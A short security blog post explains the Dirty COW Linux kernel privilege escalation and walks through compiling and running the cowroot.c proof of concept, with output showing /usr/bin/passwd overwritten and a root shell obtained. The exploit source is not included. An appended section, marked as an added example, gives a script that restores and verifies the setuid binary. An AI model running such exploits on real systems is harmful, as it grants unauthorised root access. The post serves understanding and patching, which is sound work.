CVE 2016-5195 dirtycow

Posted on 11 Dec 2016 in security • 2 min read


Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. "A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." (Source: Red Hat)

In short, with the right code doing the right thing at the right time, an unprivileged user can get root permissions on most GNU/Linux systems. The satirical website was originally created to make fun of people giving names to vulnerabilities; a YouTube video was even made. Nevertheless, the website's wiki (on GitHub) links to a few PoCs.

I tested one of these PoCs on my test computer. The exploits were not fully stable at the time, and my computer was sometimes freezing just after getting root privileges.

I used a modified version of the cowroot.c PoC hosted on a gist. First of all we compile the exploit code:

[maggick@computer_name dirtycow]$ gcc cowroot.c -o cowroot -pthread
cowroot.c: In function ‘procselfmemThread’:
cowroot.c:107:17: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [-Wint-conversion]
In file included from cowroot.c:27:0:
/usr/include/unistd.h:337:16: note: expected ‘__off_t {aka long int}’ but argument is of type ‘void *’
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
cowroot.c: In function ‘main’:
cowroot.c:144:5: warning: implicit declaration of function ‘asprintf’ [-Wimplicit-function-declaration]
     asprintf(&backup, "cp %s /tmp/bak", suid_binary);
cowroot.c:148:5: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]

The warnings are not really important; after compilation we just launch the exploit:

[maggick@computer_name dirtycow]$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 47224
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
[root@computer_name dirtycow]# id
uid=0(root) gid=1000(maggick) groups=1000(maggick)

And we got root privileges as planned. The exploit replaces the /usr/bin/passwd executable, so we need to restore it from the copy in /tmp/bak.
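The restore step deserves a check rather than a bare copy: the backup in /tmp/bak was made by the unprivileged user, so it carries neither root ownership nor the setuid bit, and a careless restore (for example `cp -p`, which copies the backup's owner and mode onto the target) leaves passwd unusable for ordinary users. The script below is an added example, not part of the original post or of the cowroot.c PoC. It assumes the paths printed by the PoC (/usr/bin/passwd and /tmp/bak) and that it is run from the root shell obtained above; the script name `verify_restore.sh` is a made-up name for the guard at the bottom. It copies the backup over the target without `-p`, so the target inode keeps its existing root owner and 4755 mode, then verifies both the content hash and the owner/mode and returns a distinct exit code for each failure.

```shell
#!/bin/sh
# Added example (not from the original post or the cowroot.c PoC): restore a
# setuid binary from a backup and verify the result. Defaults match the PoC
# output; run from a root shell.

# Print the SHA-256 of a file (sha256sum on GNU systems, shasum elsewhere).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Return 0 if both files have identical content, 1 otherwise.
same_content() {
    [ "$(file_sha256 "$1")" = "$(file_sha256 "$2")" ]
}

# Return 0 if the file is owned by root and carries the setuid bit, 1 otherwise.
# [ -u FILE ] is the POSIX test for the set-user-ID bit.
is_setuid_root() {
    [ -u "$1" ] && [ "$(ls -ld "$1" | awk '{print $3}')" = "root" ]
}

# Restore TARGET from BACKUP and verify it.
# Plain cp (no -p) truncates and rewrites the existing target inode, so the
# target keeps its own owner and mode instead of inheriting the backup's
# unprivileged owner and non-setuid mode.
# Exit codes: 0 ok, 1 copy failed, 2 content mismatch, 3 bad owner/mode.
restore_and_verify() {
    target="$1"
    backup="$2"
    cp "$backup" "$target" || return 1
    same_content "$target" "$backup" || {
        echo "content mismatch on $target" >&2
        return 2
    }
    is_setuid_root "$target" || {
        echo "$target is not a root-owned setuid binary (fix with chown root and chmod 4755)" >&2
        return 3
    }
    echo "$target restored and verified"
}

# Run only when executed directly (hypothetical script name), so the
# functions can also be sourced from another script.
if [ "${0##*/}" = "verify_restore.sh" ]; then
    restore_and_verify "${1:-/usr/bin/passwd}" "${2:-/tmp/bak}"
fi
```

A non-zero exit code of 3 after the copy means the content is back but the binary has lost its root owner or setuid bit; in that case `chown root:root` and `chmod 4755` on the target, then re-run the check. If the backup itself is not trusted, the package manager's own verification (`rpm -V` or `debsums`, depending on the distribution) is the better reference than /tmp/bak.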

To fix this vulnerability we just need to upgrade our kernel to a version that contains the patch.